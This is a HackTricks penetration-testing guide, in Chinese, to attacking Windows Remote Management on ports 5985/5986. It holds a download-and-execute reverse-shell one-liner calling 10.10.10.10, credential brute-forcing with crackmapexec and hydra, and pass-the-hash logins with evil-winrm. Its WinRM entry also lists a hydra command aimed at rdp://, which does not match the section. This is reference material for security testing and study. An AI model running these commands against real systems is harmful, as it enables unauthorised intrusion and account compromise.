# 5985,5986 - Pentesting WinRM
{% hint style="success" %}
学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
{% endhint %}
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的漏洞赏金计划和重要平台更新
**今天就加入我们,进入** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## WinRM
[Windows 远程管理 (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 被微软强调为一种 **协议**,它通过 HTTP(S) 实现 **Windows 系统的远程管理**,并在此过程中利用 SOAP。它基本上由 WMI 提供支持,呈现为 WMI 操作的基于 HTTP 的接口。
WinRM 在机器上的存在允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否正常运行,建议检查特定端口的开放情况:
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
上述列表中的开放端口表示 WinRM 已被设置,从而允许尝试启动远程会话。
### **启动 WinRM 会话**
要为 WinRM 配置 PowerShell,微软的 `Enable-PSRemoting` cmdlet 将发挥作用,设置计算机以接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任:
```powershell
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
这种方法涉及在 `trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还需要注意的是,可能需要将攻击者机器上的网络类型从“公共”更改为“工作”。
此外,可以使用 `wmic` 命令**远程激活** WinRM,示例如下:
```powershell
wmic /node: process call create "powershell enable-psremoting -force"
```
这种方法允许远程设置 WinRM,从而增强了远程管理 Windows 机器的灵活性。
### 测试是否已配置
要验证攻击机器的设置,使用 `Test-WSMan` 命令检查目标是否正确配置了 WinRM。通过执行此命令,您应该期望收到有关协议版本和 wsmid 的详细信息,指示配置成功。以下是演示已配置目标与未配置目标预期输出的示例:
* 对于一个 **已** 正确配置的目标,输出将类似于:
```bash
Test-WSMan
```
响应应包含有关协议版本和wsmid的信息,表明WinRM已正确设置。
![](<../.gitbook/assets/image (582).png>)
* 相反,对于**未**配置WinRM的目标,将不会返回此类详细信息,突显出缺乏适当的WinRM设置。
![](<../.gitbook/assets/image (458).png>)
### 执行命令
要在目标机器上远程执行`ipconfig`并查看其输出,请执行:
```powershell
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
![](<../.gitbook/assets/image (151).png>)
您还可以通过 _**Invoke-Command**_ **在当前 PS 控制台中执行命令**。假设您在本地有一个名为 _**enumeration**_ 的函数,并且您想要 **在远程计算机上执行它**,您可以这样做:
```powershell
Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
### 执行脚本
```powershell
Invoke-Command -ComputerName -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### 获取反向 shell
```powershell
Invoke-Command -ComputerName -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### 获取 PS 会话
要获取交互式 PowerShell shell,请使用 `Enter-PSSession`:
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
```
![](<../.gitbook/assets/image (1009).png>)
**会话将在“受害者”内部的一个新进程(wsmprovhost)中运行**
### **强制打开 WinRM**
要使用 PS Remoting 和 WinRM,但计算机未配置,可以通过以下方式启用它:
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
### 保存和恢复会话
这 **将不起作用** 如果远程计算机中的 **语言** 被 **限制**。
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
在此会话中,您可以使用 _Invoke-Command_ 加载 PS 脚本。
```powershell
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
### 错误
如果您发现以下错误:
`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.`
尝试在客户端(信息来自 [这里](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客洞察**\
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的漏洞赏金计划和重要平台更新
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶级黑客开始合作!
## 在Linux中连接WinRM
### 暴力破解
请小心,暴力破解winrm可能会阻止用户。
```ruby
#Brute force
crackmapexec winrm -d -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm -d -u -p -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm -d -u -H -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
### 使用 evil-winrm
```ruby
gem install evil-winrm
```
阅读其 GitHub 上的 **documentation**: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i /
```
要使用 evil-winrm 连接到 **IPv6 地址**,在 _**/etc/hosts**_ 中创建一个条目,将 **域名** 设置为 IPv6 地址并连接到该域名。
### 使用 evil-winrm 传递哈希
```ruby
evil-winrm -u -H -i
```
![](<../.gitbook/assets/image (680).png>)
### 使用 PS-docker 机器
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### 使用 Ruby 脚本
**代码摘自这里:** [**https://alamot.github.io/winrm\_shell/**](https://alamot.github.io/winrm\_shell/)
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)
class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
```
## Shodan
* `port:5985 Microsoft-HTTPAPI`
## 参考
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## HackTricks 自动命令
```
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的漏洞赏金计划和重要平台更新
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
{% endhint %}